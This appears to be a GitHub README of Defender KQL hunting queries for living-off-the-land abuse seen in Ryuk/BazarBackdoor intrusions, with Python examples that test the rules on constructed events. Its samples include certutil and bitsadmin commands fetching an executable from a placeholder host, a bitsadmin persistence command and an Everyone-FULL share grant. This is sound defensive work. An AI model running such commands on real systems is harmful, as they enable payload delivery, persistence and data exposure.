This repo contains some personal queries I developed for MS Defender Security Center for known threats. Hope they can be useful. If you find any FP or you want to suggest a modification, please send a PR.
## Detection queries based on Living Off The Land Binaries and Scripts (LOLBAS) criteria
Certutil.exe is a Windows binary used for handling certificates; the query detects download and encode/decode operations.

```kql
DeviceProcessEvents
| where ProcessVersionInfoOriginalFileName == "CertUtil.exe"
| where ProcessCommandLine contains "://" or ProcessCommandLine contains "-encode" or ProcessCommandLine contains "-decode"
```
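The following is an added example, not one of this repo's queries: it re-implements the certutil rule in Python so the matching semantics can be exercised offline against constructed events. It assumes the documented KQL behaviour that `==` is case-sensitive while `contains` is case-insensitive; the `ProcessEvent` class, the helper names and the sample command lines are all constructed for the example.

```python
"""Offline re-implementation of the certutil.exe hunting query (added example)."""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Subset of the DeviceProcessEvents columns the query touches."""
    ProcessVersionInfoOriginalFileName: str
    ProcessCommandLine: str


def kql_contains(value: str, needle: str) -> bool:
    """KQL `contains`: case-insensitive substring match."""
    return needle.lower() in value.lower()


def certutil_suspicious(ev: ProcessEvent) -> bool:
    """Mirror of the query: OriginalFileName equality, then any of three substrings."""
    # KQL `==` is case-sensitive, so "certutil.exe" would NOT match here;
    # `=~` is the case-insensitive form if the casing of the field varies.
    if ev.ProcessVersionInfoOriginalFileName != "CertUtil.exe":
        return False
    cmd = ev.ProcessCommandLine
    return (kql_contains(cmd, "://")
            or kql_contains(cmd, "-encode")
            or kql_contains(cmd, "-decode"))


def hunt(events):
    """Return the command lines of the events the query would surface."""
    return [e.ProcessCommandLine for e in events if certutil_suspicious(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent("CertUtil.exe", "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"),
    ProcessEvent("CertUtil.exe", "certutil -Encode payload.bin out.txt"),   # mixed case still matches
    ProcessEvent("CertUtil.exe", "certutil -decode out.txt payload.bin"),
    ProcessEvent("CertUtil.exe", "certutil -store My"),                     # benign store listing
    ProcessEvent("CertUtil.exe", "certutil -verify -urlfetch cert.cer"),    # no "://" in the line, not caught
    ProcessEvent("cmd.exe", "cmd /c certutil -decode x y"),                 # wrong OriginalFileName
]

if __name__ == "__main__":
    for line in hunt(SAMPLE_EVENTS):
        print(line)
```

The `-urlfetch` sample shows the limit of keying on `://`: a fetch that names no scheme is missed, so a practitioner may want to add the `-urlcache` and `-urlfetch` switches to the substring list.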
## Detection opportunities highlighted in Red Canary blog post "A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak"
```kql
DeviceProcessEvents
| where InitiatingProcessFileName == "cmd.exe"
| where ProcessCommandLine matches regex "^$"
| where FileName has_any("net.exe", "explorer.exe", "nltest.exe")
```
```kql
DeviceProcessEvents
| where FileName == "nltest.exe"
| where ProcessCommandLine has_any("/dclist:", "/domain_trusts", "/all_trusts")
```
```kql
DeviceProcessEvents
| where FileName == "net.exe"
// exclude local PC groups enumeration from the results, can generate FP
// e.g. you have hits for local groups when Defender ATP collects the investigation package
| where ProcessCommandLine !contains "localgroup"
| where ProcessCommandLine contains "group"
```
```kql
DeviceProcessEvents
| where FileName == "svchost.exe"
| where InitiatingProcessFileName !in ("services.exe", "MsMpEng.exe")
// exclude from the search parent process svchost.exe with -k option
| where not(InitiatingProcessFileName == "svchost.exe" and InitiatingProcessCommandLine contains "-k")
```

TODO: I see some False Positives, try to improve the search.
```kql
DeviceProcessEvents
| where FileName == "svchost.exe"
| where ProcessCommandLine matches regex "^$"
// exclude from the search parent process svchost.exe with -k option
| where not(InitiatingProcessFileName == "svchost.exe" and InitiatingProcessCommandLine contains "-k")
```
```kql
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "-encodedcommand"
```
```kql
DeviceProcessEvents
| where FileName == "powershell.exe"
| where InitiatingProcessFileName == "cmd.exe"
| where InitiatingProcessParentFileName == "wmiprvse.exe"
```
```kql
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine matches regex "^$"
```

TODO: implement a connection check for the process.

Check Detection Opportunity 3 in the post.
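The block below is an added example, not one of this repo's queries: it re-runs the rundll32 empty-command-line rule offline and adds the "connection check" the TODO asks for by correlating each hit with network events from the same process. The column names follow the DeviceProcessEvents and DeviceNetworkEvents schema; the two dataclasses, the 10-minute window and the sample events are constructed assumptions. In Advanced Hunting the same correlation is a `join` between the two tables on `DeviceId` and `ProcessId` / `InitiatingProcessId`, bounded by time.

```python
"""rundll32.exe with an empty command line, correlated with its network events (added example)."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcessEvent:
    DeviceId: str
    Timestamp: datetime
    ProcessId: int
    FileName: str
    ProcessCommandLine: str


@dataclass
class NetworkEvent:
    DeviceId: str
    Timestamp: datetime
    InitiatingProcessId: int
    RemoteIP: str
    RemotePort: int


def empty_cmdline_rundll32(events):
    """FileName == "rundll32.exe" and ProcessCommandLine matches regex "^$".
    The regex "^$" only matches a completely empty command line."""
    return [e for e in events
            if e.FileName == "rundll32.exe" and e.ProcessCommandLine == ""]


def with_connections(proc_events, net_events, window=timedelta(minutes=10)):
    """Join hits to network events on DeviceId and process id, keeping only
    connections that start inside `window` after process creation.
    Process ids are recycled, so an unbounded join would link unrelated events."""
    hits = []
    for p in empty_cmdline_rundll32(proc_events):
        for n in net_events:
            if (n.DeviceId == p.DeviceId
                    and n.InitiatingProcessId == p.ProcessId
                    and p.Timestamp <= n.Timestamp <= p.Timestamp + window):
                hits.append((p.DeviceId, p.ProcessId, n.RemoteIP, n.RemotePort))
    return hits


# Constructed sample telemetry (not real data).
T0 = datetime(2021, 1, 1, 12, 0, 0)
PROC = [
    ProcessEvent("dev-A", T0, 4120, "rundll32.exe", ""),                      # hit
    ProcessEvent("dev-A", T0, 4200, "rundll32.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL"),                  # normal invocation
    ProcessEvent("dev-B", T0, 4120, "rundll32.exe", ""),                      # hit, but no connection
]
NET = [
    NetworkEvent("dev-A", T0 + timedelta(seconds=30), 4120, "203.0.113.10", 443),  # inside window
    NetworkEvent("dev-A", T0 + timedelta(hours=2), 4120, "203.0.113.11", 443),     # same pid, reused later
    NetworkEvent("dev-B", T0 + timedelta(seconds=5), 9999, "198.51.100.7", 443),   # another process
]

if __name__ == "__main__":
    for hit in with_connections(PROC, NET):
        print(hit)
```

Only the dev-A process that actually connected within the window is reported; the dev-B hit stays in the process-only result set for manual triage.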
```kql
DeviceProcessEvents
| where FileName == "adfind.exe"
```
## Detection steps highlighted in Vitali Kremez blog post "Anatomy of Attack: Inside BazarBackdoor to Ryuk Ransomware "one" Group via Cobalt Strike"
```kql
DeviceProcessEvents
| where FileName == "net.exe"
| where ProcessCommandLine contains "view"
// exclude FP
| where ProcessCommandLine !contains "vmware-view-usbd"
```
```kql
DeviceProcessEvents
| where FileName == "net.exe"
| where ProcessCommandLine has "share" and ProcessCommandLine contains "GRANT"
```

Check for a GRANT; in the post Vitali shows FULL access granted to Everyone: `net share aaa$=C:\aaa /GRANT:Everyone,FULL`
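As an added example (not part of this repo), the parser below pulls the share name, the exported path and every `/GRANT:<principal>,<permission>` clause out of a `net share` command line, so a hit from the query above can be triaged automatically; the Everyone/FULL case from the post is the one it flags. The tokenizer, the `NetShare` class and the sample command lines are constructed; the `READ`, `CHANGE` and `FULL` permission names are the ones `net share` accepts.

```python
"""Parse `net share` command lines and flag shares granting FULL to Everyone (added example)."""
import re
from dataclasses import dataclass, field

# A token is a run of quoted segments and/or non-space characters,
# so `"my share"="C:\my dir"` stays one token.
TOKEN_RE = re.compile(r'(?:"[^"]*"|[^\s"])+')
GRANT_RE = re.compile(r"(?i)/grant:([^,]+),(read|change|full)")


@dataclass
class NetShare:
    share: str
    path: str
    grants: list = field(default_factory=list)   # (principal, permission) pairs


def parse_net_share(cmdline: str):
    """Return a NetShare for `net share <name>=<path> [/GRANT:user,perm ...]`,
    or None when the line is not a share-creation command."""
    tokens = [t.replace('"', "") for t in TOKEN_RE.findall(cmdline)]
    # tokens[0] is the executable (net / net.exe); tokens[1] must be the subcommand
    if len(tokens) < 3 or tokens[1].lower() != "share" or "=" not in tokens[2]:
        return None
    name, path = tokens[2].split("=", 1)
    result = NetShare(share=name, path=path)
    for tok in tokens[3:]:
        m = GRANT_RE.fullmatch(tok)
        if m:
            result.grants.append((m.group(1), m.group(2).upper()))
    return result


def everyone_full(cmdline: str) -> bool:
    """True when the share grants FULL to Everyone, the pattern shown in the post."""
    share = parse_net_share(cmdline)
    return share is not None and any(
        principal.lower() == "everyone" and perm == "FULL"
        for principal, perm in share.grants)


# Constructed sample command lines (not real telemetry).
SAMPLES = [
    r"net share aaa$=C:\aaa /GRANT:Everyone,FULL",                  # the case from the post
    r'net share "my share"="C:\my dir" /GRANT:Everyone,FULL',      # quoted name and path
    r"net share data=D:\data /GRANT:CORP\svc-backup,READ",         # scoped, read-only
    r"net share",                                                  # listing only
    r"net view \\fileserver",                                      # not a share command
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(everyone_full(line), parse_net_share(line))
```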
## Detection of bitsadmin.exe usage to download malware and create persistence as shown in FireEye post "Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service"
```kql
DeviceProcessEvents
| where ProcessVersionInfoOriginalFileName == "bitsadmin.exe"
| where ProcessCommandLine contains "/addfile"
```

Check using bitsadmin to create a job that downloads an executable (malware) and stores it somewhere.
```kql
DeviceProcessEvents
| where ProcessVersionInfoOriginalFileName == "bitsadmin.exe"
| where ProcessCommandLine contains "/SetNotifyCmdLine"
```

Check using bitsadmin to create a job to gain persistence.
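The code below is an added example serving both bitsadmin queries above (it is not part of this repo): it extracts the job name, remote URL and local path from a `/addfile` command line and the notification command from a `/SetNotifyCmdLine` one, which is the information an analyst needs to triage a hit. It relies on the documented argument order of those two switches (`/addfile <job> <remote URL> <local name>` and `/SetNotifyCmdLine <job> <program> [parameters]`); the `BitsFinding` class, the executable-extension list and the sample command lines are constructed.

```python
"""Extract triage fields from bitsadmin /addfile and /SetNotifyCmdLine command lines (added example)."""
import os
import re
from dataclasses import dataclass
from typing import Optional

# Quoted segments and non-space runs form one token, so quoted paths survive.
TOKEN_RE = re.compile(r'(?:"[^"]*"|[^\s"])+')
# Extensions that make a downloaded file worth a closer look (constructed list).
EXEC_EXT = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta"}


@dataclass
class BitsFinding:
    job: str
    kind: str                           # "download" (/addfile) or "persistence" (/SetNotifyCmdLine)
    remote_url: Optional[str] = None
    local_path: Optional[str] = None
    notify_cmd: Optional[str] = None


def parse_bitsadmin(cmdline: str) -> Optional[BitsFinding]:
    """Return the fields of the first /addfile or /SetNotifyCmdLine switch found, else None."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    lowered = [t.lower() for t in tokens]          # bitsadmin switches are case-insensitive
    if "/addfile" in lowered:
        i = lowered.index("/addfile")
        if len(tokens) >= i + 4:
            return BitsFinding(job=tokens[i + 1], kind="download",
                               remote_url=tokens[i + 2], local_path=tokens[i + 3])
    if "/setnotifycmdline" in lowered:
        i = lowered.index("/setnotifycmdline")
        if len(tokens) >= i + 3:
            return BitsFinding(job=tokens[i + 1], kind="persistence",
                               notify_cmd=" ".join(tokens[i + 2:]))
    return None


def is_executable_download(finding: Optional[BitsFinding]) -> bool:
    """True when an /addfile job writes a file with an executable extension."""
    return (finding is not None and finding.kind == "download"
            and finding.local_path is not None
            and os.path.splitext(finding.local_path)[1].lower() in EXEC_EXT)


# Constructed sample command lines (not real telemetry).
SAMPLES = [
    r"bitsadmin /addfile job1 http://example.invalid/update.exe C:\Users\Public\update.exe",
    r'bitsadmin /SetNotifyCmdLine job1 "C:\Users\Public\update.exe" NULL',
    r"bitsadmin /addfile docs http://example.invalid/report.pdf C:\Users\Public\report.pdf",
    r"bitsadmin /create job1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        f = parse_bitsadmin(line)
        print(is_executable_download(f), f)
```

The two findings for `job1` share a job name, so correlating `/addfile` and `/SetNotifyCmdLine` hits on that field ties the download to the persistence step the FireEye post describes.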